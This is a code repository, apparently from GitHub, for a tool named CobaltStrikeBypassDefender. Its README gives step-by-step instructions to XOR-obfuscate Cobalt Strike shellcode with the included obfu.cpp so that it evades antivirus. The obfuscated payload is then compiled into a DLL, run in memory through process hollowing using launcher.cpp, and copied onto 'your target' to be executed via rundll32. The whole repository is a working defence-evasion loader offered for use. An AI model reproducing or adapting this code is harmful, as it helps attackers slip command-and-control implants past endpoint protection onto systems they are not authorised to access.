├── .gitattributes
├── .assets
    └── minia.jpg
├── lib
    ├── launcher.exe
    ├── shellcode.dll
    ├── libstdc++-6.dll
    ├── libgcc_s_seh-1.dll
    └── libwinpthread-1.dll
├── launcher.cpp
├── README.md
└── ANTIVIRUS_EXCLUDED_FOLDER
    └── obfu.cpp


/.gitattributes:
--------------------------------------------------------------------------------
1 | # Auto detect text files and perform LF normalization
2 | * text=auto
3 | 


--------------------------------------------------------------------------------
/.assets/minia.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ProcessusT/CobaltStrikeBypassDefender/HEAD/.assets/minia.jpg


--------------------------------------------------------------------------------
/lib/launcher.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ProcessusT/CobaltStrikeBypassDefender/HEAD/lib/launcher.exe


--------------------------------------------------------------------------------
/lib/shellcode.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ProcessusT/CobaltStrikeBypassDefender/HEAD/lib/shellcode.dll


--------------------------------------------------------------------------------
/lib/libstdc++-6.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ProcessusT/CobaltStrikeBypassDefender/HEAD/lib/libstdc++-6.dll


--------------------------------------------------------------------------------
/lib/libgcc_s_seh-1.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ProcessusT/CobaltStrikeBypassDefender/HEAD/lib/libgcc_s_seh-1.dll


--------------------------------------------------------------------------------
/lib/libwinpthread-1.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ProcessusT/CobaltStrikeBypassDefender/HEAD/lib/libwinpthread-1.dll


--------------------------------------------------------------------------------
/launcher.cpp:
--------------------------------------------------------------------------------
 1 | #include <iostream>
 2 | #include <Windows.h>
 3 | 
 4 | typedef int (__cdecl *main_pfn)(int argc, char *argv[]);
 5 | 
 6 | 
 7 | int main(int argc, char *argv[]) {
 8 |   HMODULE hMod = LoadLibrary("shellcode.dll");
 9 |   if (hMod == nullptr) {
10 |     std::cout << "Failed to load shellcode.dll" << std::endl;
11 |   }
12 |   main_pfn MyMain = (main_pfn)
13 |   GetProcAddress (hMod, "RunThatShit");
14 | 
15 |   if (MyMain != nullptr)
16 |     return MyMain (argc, argv);
17 |   return 0;
18 | }
19 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | # CobaltStrikeBypassDefender
 2 | <br /><br />
 3 | 
 4 | <h3>A launcher to load a DLL with xored cobalt strike shellcode executed in memory through process hollowing technique</h3>
 5 | 
 6 | 
 7 | <br /><br />
 8 | -----------------------------------------------------
 9 | <br />
10 | 
11 | <p align="center">
12 |     My youtube video on this repo : <br /><br />
13 |     <a href="https://youtu.be/CHk2XzFKwNc" align="center" width="100%;">
14 |        <img src="https://github.com/Processus-Thief/CobaltStrikeBypassDefender/raw/main/.assets/minia.jpg" width="80%;">
15 |     </a>
16 |   </p>
17 | 
18 | <br /><br />
19 | -----------------------------------------------------
20 | <br />
21 | 
22 | 
23 | 
24 | 
25 | ### Usage
26 | 
27 | 1. Generate a x64 cobalt strike shellcode with CSSG :
28 | ```
29 | https://github.com/RCStep/CSSG
30 | ```
31 | 2. Copy your shellcode in obfu.cpp (in "ANTIVIRUS_EXCLUDED_FOLDER" folder) and compile it :
32 | ```  
33 | C:\msys64\mingw64\bin\x86_64-w64-mingw32-c++.exe -o obfu.exe obfu.cpp
34 | ```
35 | 3. Execute obfu.exe, give your own xor secret
36 | 4. Copy obfuscated-shellcode.cpp content in dll.cpp file and update shellcode char array variable in process hollowing functions
37 | 5. Compile dll.cpp and launcher.cpp :
38 | ```
39 | C:\msys64\mingw64\bin\x86_64-w64-mingw32-c++.exe -o shellcode.dll -shared dll.cpp
40 | 
41 | C:\msys64\mingw64\bin\x86_64-w64-mingw32-c++.exe -o launcher.exe launcher.cpp
42 | ```
43 | 6. Copy launcher.exe, shellcode.dll and the 3 library files on your target and execute launcher.exe or trigger the RunThatShit function with rundll32 :
44 | ```
45 | rundll32 shellcode.dll, RunThatShit
46 | ```
47 | 7. Enjoy :)
48 | <br /><br />
49 | 
50 | 
51 | 
52 | -----------------------------------------------------------------------------------
53 | 
54 | <br /><br />
55 | 
56 | 
57 | <p align="center">
58 |     My blog : <a href="https://lestutosdeprocessus.fr"><strong>https://lestutosdeprocessus.fr</strong></a>
59 |     <br />
60 |     <br />
61 |     My Discord server : <a href="https://discord.gg/JJNxV2h"><strong>https://discord.gg/JJNxV2h</strong></a>
62 | </p>
63 | 
64 | 
65 | 
66 |  
67 | 


--------------------------------------------------------------------------------
/ANTIVIRUS_EXCLUDED_FOLDER/obfu.cpp:
--------------------------------------------------------------------------------
 1 | #include "Windows.h"
 2 | #include "iostream"
 3 | #include <fstream>
 4 | #include <string>
 5 | #include <time.h>
 6 | #include <stdlib.h>
 7 | 
 8 | 
 9 | using namespace std;
10 | 
11 | 
12 | string randString(int size){
13 | 	string a;
14 | 	for(int i = 0; i < size; i++)
15 | 	{
16 | 		int asc_value = rand() % 122 + 65;
17 | 		if( (asc_value <= 90 && asc_value >= 65)  || (asc_value >= 97 && asc_value <= 122))
18 | 		a +=  (char)asc_value;
19 | 		else
20 | 		i--;
21 | 		
22 | 	}
23 | return a;	
24 | }
25 | 
26 | 
27 | 
28 | 
29 | void obfuscate(string fName, string aName, unsigned char *shelly, int s_c, string key, string kName){
30 | 	ofstream cout("obfuscated-shellcode.cpp");
31 | 	unsigned char encodedShelly[s_c];
32 | 	cout << "std::string "<<kName <<"="<<"\"" << key << "\"" <<";" << endl << endl; 
33 | 	cout << "char "<<aName <<"[]" <<" = " << "\"";
34 | 	
35 | 	int j =0;
36 | 	for(int i = 0; i < s_c; i++)
37 | 	{
38 | 		if(j >= key.size() -1)
39 | 			j=0;
40 | 		encodedShelly[i] = shelly[i] ^ key[j];
41 | 		j++;
42 | 	}
43 | 	for(int i = 0; i < s_c; i++)
44 | 	{
45 | 		cout <<"\\x"<< hex << (int)encodedShelly[i];
46 | 	}
47 | 	cout << "\";";
48 | 	
49 | 	cout << endl << endl << endl;
50 | 	cout << "int j = 0;" << endl;
51 | 	cout << "for(int i=0; i < sizeof " << aName << "; i++){" << endl;
52 | 	cout << "if(j == "<< kName << ".size()" <<" -1) j=0;" << endl;
53 | 	cout << aName << "[" << "i" << "]" << " = " << aName << "[" << "i" << "]" << "^" << kName <<"[j]" << ";" << endl;
54 | 	cout <<"j++;";
55 | 	cout << "}";	
56 | }
57 | 
58 | 
59 | 
60 | 
61 | int main()
62 | {
63 | 	unsigned seed = time(0);
64 | 	srand(seed);
65 | 
66 | 	int funcNameSize = rand() % 15 + 5;
67 | 	string funcName = randString(funcNameSize);
68 | 
69 | 	int arrNameSize = rand() % 13+7;
70 | 	string arrName = randString(arrNameSize);
71 | 
72 | 	int keyNameSize = rand() % 19+7;
73 | 	string keyName = randString(keyNameSize);
74 | 
75 | 	int ptrNameSize = rand() % 25+5;
76 | 	string ptrName = randString(ptrNameSize);
77 | 
78 | 	cout << "Encoding Key= ";
79 | 	string encodeKey;
80 | 	cin >> encodeKey;
81 | 
82 | 	unsigned char buf[] = "<YOUR X64 COBALT STRIKE SHELLCODE HERE>";
83 | 
84 | 	obfuscate(funcName, arrName, buf, sizeof buf, encodeKey, keyName);
85 | 
86 | }


--------------------------------------------------------------------------------